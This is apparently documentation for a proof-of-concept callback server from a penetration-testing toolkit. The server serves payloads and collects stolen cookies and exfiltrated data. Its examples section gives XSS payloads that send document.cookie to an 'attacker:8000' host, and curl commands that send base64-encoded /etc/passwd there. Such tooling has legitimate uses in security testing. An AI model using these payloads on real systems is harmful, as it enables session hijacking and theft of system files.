Servers
HTTP servers for serving payloads and logging callbacks.
POC HTTP Server
Simple HTTP server that serves payloads and logs all requests. Automatically captures cookies and exfiltrated data.
Simple HTTP server for POC development.
This module provides a lightweight HTTP server that: - Serves files from the payloads/ directory - Logs all incoming requests to logs/server.ndjson - Automatically captures cookies and exfiltrated data - Provides an event queue accessible via HTTP DELETE /queue
The server supports both query parameters and path parameters for cookie and exfil data capture: - Query: /?cookie=data or /?exfil=data - Path: /cookie/data or /exfil/data
- class your_project.servers.server.POCHTTPHandler(*args, **kwargs)[source]
Bases:
SimpleHTTPRequestHandlerHTTP request handler for POC development.
Extends SimpleHTTPRequestHandler to add: - Automatic request logging - Cookie capture from query params or path - Exfil data capture from query params or path - Event queue for interesting captures - CORS support for XSS callbacks
- __init__(*args, **kwargs)[source]
Initialize the handler.
Automatically sets the serving directory to payloads/.
- do_DELETE()[source]
Handle DELETE requests for event queue.
DELETE /queue pops and returns the next event from the queue. Returns 200 with JSON event data if available, 204 if queue is empty.
- Returns:
{“type”: “cookie”, “data”: “…”, “timestamp”: “…”} Or 204 No Content if queue is empty
- Return type:
JSON with event data
- do_POST()[source]
Handle POST requests.
Logs the request and body, then sends a JSON response confirming the data was received.
- handle_request()[source]
Log request details and capture interesting data.
Logs all request details to logs/server.ndjson and checks for: - Cookies in query (?cookie=) or path (/cookie/) - Exfil data in query (?exfil=) or path (/exfil/)
Captured cookies and exfil data are: - Displayed in console with colored output - Added to the event queue (accessible via DELETE /queue) - Logged to server.ndjson
Cookie data is automatically base64-decoded if possible. Path parameters are URL-decoded automatically.
- log_message(format, *args)[source]
Log an arbitrary message.
This is used by all other logging functions. Override it if you have specific logging wishes.
The first argument, FORMAT, is a format string for the message to be logged. If the format string contains any % escapes requiring parameters, they should be specified as subsequent arguments (it’s just like printf!).
The client ip and current date/time are prefixed to every message.
Unicode control characters are replaced with escaped hex before writing the output to stderr.
- your_project.servers.server.main_with_args(args)[source]
Main entry point called from CLI.
Starts the HTTP server on the specified host and port. Displays all available network interfaces and their IPs.
- Parameters:
args – Namespace with bind (str) and port (int) attributes
The server will: - Serve files from payloads/ directory - Log all requests to logs/server.ndjson - Capture cookies and exfil data automatically - Provide event queue at DELETE /queue
Usage
Start the server from your project directory:
# Using the CLI (recommended):
uv run your_project --server
# Or run directly:
uv run python -m your_project.servers.server
The server will:
Serve files from
payloads/directoryLog all requests to
logs/server.ndjsonCapture cookies from
?cookie=parameter or/cookie/pathCapture exfil data from
?exfil=parameter or/exfil/pathProvide event queue via
DELETE /queueendpoint
Examples
Cookie Capture:
Query parameter:
// XSS payload
fetch('http://attacker:8000/?cookie=' + btoa(document.cookie))
Path parameter:
// XSS payload
fetch('http://attacker:8000/cookie/' + encodeURIComponent(document.cookie))
Exfil Data:
Query parameter:
# XXE payload callback
curl "http://attacker:8000/?exfil=$(cat /etc/passwd | base64)"
Path parameter:
# XXE payload callback
curl "http://attacker:8000/exfil/$(cat /etc/passwd | base64)"
Getting Events:
import requests
# Pop next event from queue
response = requests.delete('http://localhost:8000/queue')
if response.status_code == 200:
event = response.json()
print(f"Type: {event['type']}, Data: {event['data']}")